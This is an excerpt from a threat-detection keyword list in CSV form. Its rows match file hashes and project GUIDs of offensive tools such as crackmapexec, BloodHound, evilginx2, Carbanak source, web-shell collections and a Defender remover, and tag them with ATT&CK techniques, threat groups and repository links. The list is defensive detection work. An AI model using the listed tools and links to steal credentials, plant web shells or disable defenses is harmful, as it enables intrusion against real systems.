"*2eb2cc1eb661148109488b8f36aa6b248e88c0f1*",".{0,1000}2eb2cc1eb661148109488b8f36aa6b248e88c0f1.{0,1000}","offensive_tool_keyword","crackmapexec","crack mapexec script used by Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor - APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","24036"
"*2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e*",".{0,1000}2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24037"
"*2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775*",".{0,1000}2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24040"
"*2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775*",".{0,1000}2ebd756e16d30a5270d5b850eac35b51f1448536adb37e1b415669d51b67c775.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24041"
"*2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b*",".{0,1000}2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24045"
"*2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b*",".{0,1000}2ec87edb4eba79beefc686363936786094dacb8616bdbcccbec2cefc367f080b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24046"
"*2eca40d1fd4b3aa09ddc3985141276cfc74b1f885cd3e65dbb7bfde0ef22c033*",".{0,1000}2eca40d1fd4b3aa09ddc3985141276cfc74b1f885cd3e65dbb7bfde0ef22c033.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24047"
"*2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c*",".{0,1000}2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","24048"
"*2ed2e8804392510f60bd52822e068a73fd5be02852694258f88d9dec7917e107*",".{0,1000}2ed2e8804392510f60bd52822e068a73fd5be02852694258f88d9dec7917e107.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24049"
"*2ed48bbca6f89e16c2503726e0dfd5cd01a5ec762178a10d598e91a68beec841*",".{0,1000}2ed48bbca6f89e16c2503726e0dfd5cd01a5ec762178a10d598e91a68beec841.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24050"
"*2edd8774c18c9ba021f29ea142729d82bacf37ef2c58b45f43a7507785670c53*",".{0,1000}2edd8774c18c9ba021f29ea142729d82bacf37ef2c58b45f43a7507785670c53.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","24052"
"*2edec08af53d0c00c6c82c90529c6cd22065f668e7daca796c8e783e5c22ed53*",".{0,1000}2edec08af53d0c00c6c82c90529c6cd22065f668e7daca796c8e783e5c22ed53.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24053"
"*2ee0ee369247cdd09022301ea9967eb2e6fe70526499c7968a980ef46f2d0645*",".{0,1000}2ee0ee369247cdd09022301ea9967eb2e6fe70526499c7968a980ef46f2d0645.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24054"
"*2ee22d22298209b3f5114b4f64a067d1933477b6c5259e28cf8f8d387450cb7b*",".{0,1000}2ee22d22298209b3f5114b4f64a067d1933477b6c5259e28cf8f8d387450cb7b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24056"
"*2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4*",".{0,1000}2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24057"
"*2ee7f67057652ae099d25d96acc90bae127af618a0409fc2a603e6382cbfedcd*",".{0,1000}2ee7f67057652ae099d25d96acc90bae127af618a0409fc2a603e6382cbfedcd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24058"
"*2ee991b61ed7a2831541079d85b4048128f5964ad70f03940365ad4607cc2da9*",".{0,1000}2ee991b61ed7a2831541079d85b4048128f5964ad70f03940365ad4607cc2da9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24059"
"*2eeba6742b716b69144db95b0240d6d7a50d48f28f2dec83b003e74ff4958ad1*",".{0,1000}2eeba6742b716b69144db95b0240d6d7a50d48f28f2dec83b003e74ff4958ad1.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","24060"
"*2eec07fa568311a385f0e0b9a26b1244901efe0403163bd79d1247d1b4e38c9d*",".{0,1000}2eec07fa568311a385f0e0b9a26b1244901efe0403163bd79d1247d1b4e38c9d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24061"
"*2eeed72ee86a276b08351436a84e2d3c3e8ec3eda25f8207b9c5878bb7541764*",".{0,1000}2eeed72ee86a276b08351436a84e2d3c3e8ec3eda25f8207b9c5878bb7541764.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24062"
"*2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c*",".{0,1000}2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24063"
"*2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c*",".{0,1000}2ef42f500de7f039f5e2138ccd814afdc7c010e95878d495deb92225aa4e8d4c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24064"
"*2ef48f44bff3ba1d7d63959971a7b04f2294fb0e8926beab26692e5f2f361d44*",".{0,1000}2ef48f44bff3ba1d7d63959971a7b04f2294fb0e8926beab26692e5f2f361d44.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24065"
"*2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212*",".{0,1000}2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24066"
"*2efa21402a699dfc1777d30a71a6532c6188ba867088d8e50ae3bfbeb873992c*",".{0,1000}2efa21402a699dfc1777d30a71a6532c6188ba867088d8e50ae3bfbeb873992c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24068"
"*2f00562c23c765a32f3e1b39da4aae0db8cf0d47e19c800bba2678c7be198503*",".{0,1000}2f00562c23c765a32f3e1b39da4aae0db8cf0d47e19c800bba2678c7be198503.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24071"
"*2F00A05B-263D-4FCC-846B-DA82BD684603*",".{0,1000}2F00A05B\-263D\-4FCC\-846B\-DA82BD684603.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#GUIDproject","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","24072"
"*2F00A05B-263D-4FCC-846B-DA82BD684603*",".{0,1000}2F00A05B\-263D\-4FCC\-846B\-DA82BD684603.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24073"
"*2f00a05b-263d-4fcc-846b-da82bd684603*",".{0,1000}2f00a05b\-263d\-4fcc\-846b\-da82bd684603.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#GUIDproject","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","24074"
"*2f07406d517a0f5b8b4e46ecb1ef412924abf1bd43c451ed324f5a23e2d9e2de*",".{0,1000}2f07406d517a0f5b8b4e46ecb1ef412924abf1bd43c451ed324f5a23e2d9e2de.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24075"
"*2f1eb89e5ddbc2a72831e7ac58e9cc823d408affa6f60a35c559bddabd6eb16f*",".{0,1000}2f1eb89e5ddbc2a72831e7ac58e9cc823d408affa6f60a35c559bddabd6eb16f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24076"
"*2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba*",".{0,1000}2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24079"
"*2f270dfe3ae3f96ea722d7a164f048f7501031664db91bb799e44c13856aa86e*",".{0,1000}2f270dfe3ae3f96ea722d7a164f048f7501031664db91bb799e44c13856aa86e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24080"
"*2f29ef1160800ac8190ccf6ab09e546fc35a2aaa66b70393a9256a765d46fb46*",".{0,1000}2f29ef1160800ac8190ccf6ab09e546fc35a2aaa66b70393a9256a765d46fb46.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24081"
"*2f3c1b3378d19418aa4c99685f3ab9d6730c132a920946b64c0e4edc9efd5ed6*",".{0,1000}2f3c1b3378d19418aa4c99685f3ab9d6730c132a920946b64c0e4edc9efd5ed6.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","24085"
"*2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77*",".{0,1000}2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","#filehash","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","24087"
"*2f48cac314397716defc882e1040bba75ea54507aae551a64f67ce21e7d649c5*",".{0,1000}2f48cac314397716defc882e1040bba75ea54507aae551a64f67ce21e7d649c5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24089"
"*2f4fd04bbf02ef75845bfb287e5abc4fb7ae9a81776142b573eadadbf28fbe81*",".{0,1000}2f4fd04bbf02ef75845bfb287e5abc4fb7ae9a81776142b573eadadbf28fbe81.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24091"
"*2f511fc2e09cb09ff9711958973b513316e75827c85d1b787c7f8befc580c0f3*",".{0,1000}2f511fc2e09cb09ff9711958973b513316e75827c85d1b787c7f8befc580c0f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24092"
"*2f5d68c11ab2e44b398b3ca6820c5ecf91bc6e490418f4e2c6ce20bef7f8ff80*",".{0,1000}2f5d68c11ab2e44b398b3ca6820c5ecf91bc6e490418f4e2c6ce20bef7f8ff80.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24096"
"*2f64baa9a60ff7e4114c278a8538dc6807c52b5aed17a158cd6e4bbc89df93e3*",".{0,1000}2f64baa9a60ff7e4114c278a8538dc6807c52b5aed17a158cd6e4bbc89df93e3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24097"
"*2f66770e5243fc4bba4b3f8e15a093fb8d433909345033a7481e744ca24a4196*",".{0,1000}2f66770e5243fc4bba4b3f8e15a093fb8d433909345033a7481e744ca24a4196.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24098"
"*2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7*",".{0,1000}2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#filehash","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24099"
"*2f77333c8b958d992eb2bbbdca80efd3a90f95a45c1b9738d16ee8e0a0f3c3f8*",".{0,1000}2f77333c8b958d992eb2bbbdca80efd3a90f95a45c1b9738d16ee8e0a0f3c3f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24103"
"*2f8836f78e6c809950f78fc35d75068f7d5c206947ab009fb7b3c17315f0aded*",".{0,1000}2f8836f78e6c809950f78fc35d75068f7d5c206947ab009fb7b3c17315f0aded.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24105"
"*2F8E74D2-3474-408C-9469-A4E3C97B7BBF*",".{0,1000}2F8E74D2\-3474\-408C\-9469\-A4E3C97B7BBF.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24106"
"*2f8ed85860e64bd52c6ef3b7a4e405a9934ca78139751adb118a0074ae7ced2d*",".{0,1000}2f8ed85860e64bd52c6ef3b7a4e405a9934ca78139751adb118a0074ae7ced2d.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","24107"
"*2f9b03c897526749ff4fefbeec1eb89fcc5c303867bcbfa40ed7257c77dd001b*",".{0,1000}2f9b03c897526749ff4fefbeec1eb89fcc5c303867bcbfa40ed7257c77dd001b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24109"
